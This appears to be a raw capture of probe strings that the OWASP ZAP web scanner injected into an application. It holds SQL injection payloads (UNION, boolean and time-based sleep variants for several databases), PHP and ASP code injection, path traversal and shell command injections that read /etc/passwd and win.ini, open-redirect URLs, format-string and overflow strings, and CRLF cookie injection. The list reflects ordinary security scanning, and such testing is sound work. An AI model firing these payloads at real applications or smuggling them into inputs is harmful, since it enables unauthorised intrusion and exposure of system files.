ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ' ZAP' " ZAP" ; ZAP; '( ZAP'( ZAP ZAP ZAP AND 1=1 -- ZAP' AND '1'='1' -- ZAP" AND "1"="1" -- ZAP AND 1=1 ZAP' AND '1'='1 ZAP" AND "1"="1 ZAP UNION ALL select NULL -- ZAP' UNION ALL select NULL -- ZAP" UNION ALL select NULL -- ZAP) UNION ALL select NULL -- ZAP') UNION ALL select NULL -- ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP / sleep(15) ZAP' / sleep(15) / ' ZAP" / sleep(15) / " ZAP and 0 in (select sleep(15) ) -- ZAP' and 0 in (select sleep(15) ) -- ZAP" and 0 in (select sleep(15) ) -- ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ; select "java.lang.Thread.sleep"(15000) from INFORMATION_SCHEMA.SYSTEM_COLUMNS where TABLE_NAME = 'SYSTEM_COLUMNS' and COLUMN_NAME = 'TABLE_NAME' -- '; select "java.lang.Thread.sleep"(15000) from INFORMATION_SCHEMA.SYSTEM_COLUMNS where TABLE_NAME = 'SYSTEM_COLUMNS' and COLUMN_NAME = 'TABLE_NAME' -- "; select "java.lang.Thread.sleep"(15000) from INFORMATION_SCHEMA.SYSTEM_COLUMNS where TABLE_NAME = 'SYSTEM_COLUMNS' and COLUMN_NAME = 'TABLE_NAME' -- ); select "java.lang.Thread.sleep"(15000) from INFORMATION_SCHEMA.SYSTEM_COLUMNS where TABLE_NAME = 'SYSTEM_COLUMNS' and COLUMN_NAME = 'TABLE_NAME' -- "java.lang.Thread.sleep"(15000) ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) ZAP / (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) ZAP' / (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) / ' ZAP" / (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) / " ZAP and exists (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) -- ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP case when cast(pg_sleep(15) as varchar) > '' then 0 else 1 end case when cast(pg_sleep(15) as varchar) > '' then 0 else 1 end -- 'case when cast(pg_sleep(15) as varchar) > '' then 0 else 1 end -- "case when cast(pg_sleep(15) as varchar) > '' then 0 else 1 end -- ZAP / case when cast(pg_sleep(15) as varchar) > '' then 0 else 1 end ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP case randomblob(100000) when not null then 1 else 1 end case randomblob(1000000) when not null then 1 else 1 end zsd9frowbh8ypj3gcrnsmlbc82kbqx7aldk5ft7sf6euisrz284qhxnxy case randomblob(10000000) when not null then 1 else 1 end case randomblob(100000000) when not null then 1 else 1 end case randomblob(1000000000) when not null then 1 else 1 end 3zdcodrsc8ly8bj3yfeb4wjelmdpuo3iuw10p2yekfonqwetlbav3fbfub8o ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ";print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110));$var=" ';print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110));$var=' ${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))} ${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}\"
;print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110));
"+response.write([301.519*823.396)+""" +response.write({0}*{1})+ response.write(301.519*823.396) ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP ZAP c:/Windows/system.ini ../../../../../../../../../../../../../../../../Windows/system.ini c:\Windows\system.ini ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\system.ini /etc/passwd ../../../../../../../../../../../../../../../../etc/passwd c:/ / c:\"
../../../../../../../../../../../../../../../../
WEB-INF/web.xml
WEB-INF\web.xml" /WEB-INF/web.xml \WEB-INF\web.xml thishouldnotexistandhopefullyitwillnot http://www.google.com/ http://www.google.com:80/ http://www.google.com http://www.google.com/search?q=OWASP%20ZAP http://www.google.com:80/search?q=OWASP%20ZAP www.google.com/ www.google.com:80/ www.google.com www.google.com/search?q=OWASP%20ZAP www.google.com:80/search?q=OWASP%20ZAP 889902671787017662.owasp.org http://889902671787017662.owasp.org https://889902671787017662.owasp.org https://889902671787017662%2eowasp%2eorg 5;URL='https://889902671787017662.owasp.org' URL='http://889902671787017662.owasp.org' http://\889902671787017662.owasp.org https://\889902671787017662.owasp.org //889902671787017662.owasp.org
"><
">< 0W45pz4p
zApPX39sS ZAP 0W45pz4p ZAP
ZAP ZAP ZAP ' ZAP' " ZAP" ; ZAP; '( ZAP'( ZAP ZAP ZAP AND 1=1 -- ZAP' AND '1'='1' -- ZAP" AND "1"="1" -- ZAP AND 1=1 ZAP' AND '1'='1 ZAP" AND "1"="1 ZAP UNION ALL select NULL -- ZAP' UNION ALL select NULL -- ZAP" UNION ALL select NULL -- ZAP) UNION ALL select NULL -- ZAP') UNION ALL select NULL -- ZAP ZAP ZAP / sleep(15) ZAP' / sleep(15) / ' ZAP" / sleep(15) / " ZAP and 0 in (select sleep(15) ) -- ZAP' and 0 in (select sleep(15) ) -- ZAP" and 0 in (select sleep(15) ) -- ZAP ; select "java.lang.Thread.sleep"(15000) from INFORMATION_SCHEMA.SYSTEM_COLUMNS where TABLE_NAME = 'SYSTEM_COLUMNS' and COLUMN_NAME = 'TABLE_NAME' -- '; select "java.lang.Thread.sleep"(15000) from INFORMATION_SCHEMA.SYSTEM_COLUMNS where TABLE_NAME = 'SYSTEM_COLUMNS' and COLUMN_NAME = 'TABLE_NAME' -- "; select "java.lang.Thread.sleep"(15000) from INFORMATION_SCHEMA.SYSTEM_COLUMNS where TABLE_NAME = 'SYSTEM_COLUMNS' and COLUMN_NAME = 'TABLE_NAME' -- ); select "java.lang.Thread.sleep"(15000) from INFORMATION_SCHEMA.SYSTEM_COLUMNS where TABLE_NAME = 'SYSTEM_COLUMNS' and COLUMN_NAME = 'TABLE_NAME' -- "java.lang.Thread.sleep"(15000) ZAP (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) ZAP / (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) ZAP' / (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) / ' ZAP" / (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) / " ZAP and exists (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) -- ZAP case when cast(pg_sleep(15) as varchar) > '' then 0 else 1 end case when cast(pg_sleep(15) as varchar) > '' then 0 else 1 end -- 'case when cast(pg_sleep(15) as varchar) > '' then 0 else 1 end -- "case when cast(pg_sleep(15) as varchar) > '' then 0 else 1 end -- ZAP / case when cast(pg_sleep(15) as varchar) > '' then 0 else 1 end ZAP ZAP case randomblob(100000) when not null then 1 else 1 end imofhtdtpbh17berc1brst0ph0rkk85sujvho9vjfnnl9hxpcjy6y575 case randomblob(1000000) when not null then 1 else 1 end case randomblob(10000000) when not null then 1 else 1 end hg0eu50p0ol0xhubg4lm3siwdk9zxxbnhr80ev7382vk28hstzbypbo3yw case randomblob(100000000) when not null then 1 else 1 end nb0kq7vziar79k7klytuonp8ybjaif46lahv2ceuzsamdngvm078riw6erc case randomblob(1000000000) when not null then 1 else 1 end ZAP ZAP WAITFOR DELAY '0:0:15' -- ZAP' WAITFOR DELAY '0:0:15' -- ZAP" WAITFOR DELAY '0:0:15' -- ZAP) WAITFOR DELAY '0:0:15' -- ZAP) ' WAITFOR DELAY '0:0:15' -- ";print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110));$var=" ';print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110));$var=' ${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))} ${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}\"
;print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110));
"+response.write([198.690*634.011)+""" +response.write({0}*{1})+ response.write(198.690*634.011) cat /etc/passwd ZAP&cat /etc/passwd& ZAP;cat /etc/passwd; ZAP"&cat /etc/passwd&" ZAP";cat /etc/passwd;" ZAP'&cat /etc/passwd&' ZAP';cat /etc/passwd;' ZAP&sleep 1.0& ZAP;sleep 1.0; ZAP"&sleep 1.0&" ZAP";sleep 1.0;" ZAP'&sleep 1.0&' ZAP';sleep 1.0;' type %SYSTEMROOT%\win.ini ZAP&type %SYSTEMROOT%\win.ini ZAP|type %SYSTEMROOT%\win.ini ZAP"&type %SYSTEMROOT%\win.ini&" ZAP"|type %SYSTEMROOT%\win.ini ZAP'&type %SYSTEMROOT%\win.ini&' ZAP'|type %SYSTEMROOT%\win.ini ZAP&timeout /T 1.0 ZAP|timeout /T 1.0 ZAP|timeout /T 2.0 ZAP"&timeout /T 1.0&" ZAP"|timeout /T 1.0 ZAP'&timeout /T 1.0&' ZAP'|timeout /T 1.0 get-help ZAP;get-help ZAP";get-help ZAP';get-help ZAP;get-help # ZAP;start-sleep -s 1.0 ZAP";start-sleep -s 1.0 ZAP';start-sleep -s 1.0 ZAP;start-sleep -s 1.0 # ZAP uXOfMpTCnYDGOvXZFbdHeqWoLFMaJXBgysZTtRYfVwOOLbxNPdDVqbqLxSYjTPJmkRJCHJZiXBhrJTeAMDpWwpjRevtmidmMsScddCtikqlYLeZqwOkXePOYAXHNvlSJxfeTmvpCjXNDlNeqdoWOpJaDrfoEaHggJwtBIrSOdlmVcFHddaPuHJAafWTtuTiFQijZcureHCVRtswxSjlKNtrpdonslIBnguVfMlqOforAGmZGJdiTuZwnaoXbVXRWEjAfnTfNaOCAejuRnfZufZyywMVQbagSxmvOwCqnflhPCQcfIFvCLvnhhyfJQmAmUFQknRoRxPFXKSxnwVyiSHXEAnJYcBJQvlNqEnMhlcTZtIKFJNuHZYbIXqvkAMKWxGVFJRWJqRjhLQBJiJfXgVaeeyQjSPHngaiTRyvROOjIdZdhhlGdSheLrLNOFWSWyiVSKZFnBuUoFQlxFcVypRqbemFUwPNaYofMmatxkhtahkOuKMcmbyeovVCyCpXsnwcNXAShqTlhbgMYZmULxKLMrspWsooiZkvsOMWayhNbSvUPMoKGBidpiCnFrnLcryFXtqHduDOEiwneMcmymPvBXTgsbjjNULCaUMGLhlmKaGnyglwPJYGfgpVlpqgOFrcKtiebfHxaxQuSRguEXHZhtoSwJynjQWNNnSdAICGMDARTXCEwAmwtBvutvPQniOggSsfJfkaMxxoEWAoHEEauCjFifZgohBhngPcAhXqjVAlFQMAkcXpbVbmXZkYHNLGIyEaMuWOKVCbMmWcQIdYBmiDePLVapGcBDJqGcecEngQIiVvaREdPkwPOHXUbpRHHRIhGsdiUKDXixUXwlLMcKSJPCFGXoHxEppZevjgwXmYWAwDSWhWKZOoEQecfaIGPHwVvEUmNPNSnVZeDIUykhfLogCAsJBUqmOmSlFSdFjkoVKXJrJltZyZJhkhnTWSKKhjujGEsMgnhvRLGHVWTtyJshPnABbvRDKvQYLEMeUiImxEAMGIAaKstAfgdMlGGAYGtXpPDSsSlvtESjEDCUsfGeUdGCjHrOttURJXlZYWNENGsgnxhhxSsHqXfTBTeQTTrQfSnpmKqSDYTLwsOjLNjskauujNewgEBvYsOIgrmlhtGBYSRQJZZvsdLVFjFPgtrUHgYdAaNaYvGDJpSRsDSkUemgXykTuTuYRdnybsJXhWTnRktgKhAAbZuENuNksYkFCUVbMXrQBVSKpWKSLRXDwHLwyRrXLfBISFeVnfsLgmKjqZrylTwQTScTXLdATKTudWBGxspbDCiVfbXoCpdTKQvgTUtToRdkMhbJPkIFauHaXFxCefLeNRIWDidnuepUlCAeIxVDLlaJcYwwQOCbfoiMggaGlovIsjfsLYYqLTRvuVQIFCUIHjpvjlDLFmwYpaEDclbWsQhrqptLeeWXLravwYFsIXGWymsSRWNsAFOofNHLluclSJjYhKMTtgICnPqNLVQEEvCVqtqhwEWptKrnbEvCinZKaYUTJIDnFUlaoWAwIQbbuSWmccDktGIVyRksZuGTDYNydiOvIKxTdtERBJJVOGgjIquOjagRNyMMUvESUZRMDVlxmfeRmoqXORyKcaxjTuRenOxIUNHauNVxJatjZPWWllDHwxSanmkONeOoRSOLxNoDofuutpeBpBhXgTrpBFcCYLLLNbHhuqQEKCMkSGmPdtfPmNrxSiEGetQNGdaZLFCxQYaWFDtNGNPWqolVgfIjvLaxFelgApNvUSgYaBfcFPAyNZnuRlfTsjsPxVIlWePuHOoZnyNfjmhVgElSVXZyeieviLZVIKrWaFPZearSlQrgndcOKojJZyYTWkvrtQkhxtZwKuOvXWlWQNxZFdCrtWWwfuCtmWZiBZHbvPHWGgKwoEUVRmZnPApuqHDiJRcDanmngFEQJYLhDfhLYbKBVhYkZjYSmNxdpxaggwdHqSoHxQGtCuleXeFNDiVPnDguOkfmmFuYUlLOZvMPCwQchuxVDUcfWbISMferWAPjSvQKWGMahrjCFwvMXdsHFmqupslnsUTKQFsdxuuHruxgLplquNdGOmttmnLvwdbVFsAaKciRarP ZAP ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s
ZAP %1!s%2!s%3!s%4!s%5!s%6!s%7!s%8!s%9!s%10!s%11!s%12!s%13!s%14!s%15!s%16!s%17!s%18!s%19!s%20!s%21!n%22!n%23!n%24!n%25!n%26!n%27!n%28!n%29!n%30!n%31!n%32!n%33!n%34!n%35!n%36!n%37!n%38!n%39!n%40!n
Set-cookie: Tamper=b5d7570c-3564-4949-8172-eaccd9d5ea38 any
Set-cookie: Tamper=b5d7570c-3564-4949-8172-eaccd9d5ea38 any?
Set-cookie: Tamper=b5d7570c-3564-4949-8172-eaccd9d5ea38 any
Set-cookie: Tamper=b5d7570c-3564-4949-8172-eaccd9d5ea38 any?
Set-cookie: Tamper=b5d7570c-3564-4949-8172-eaccd9d5ea38 any
Set-cookie: Tamper=b5d7570c-3564-4949-8172-eaccd9d5ea38
any?
Set-cookie: Tamper=b5d7570c-3564-4949-8172-eaccd9d5ea38
ZAP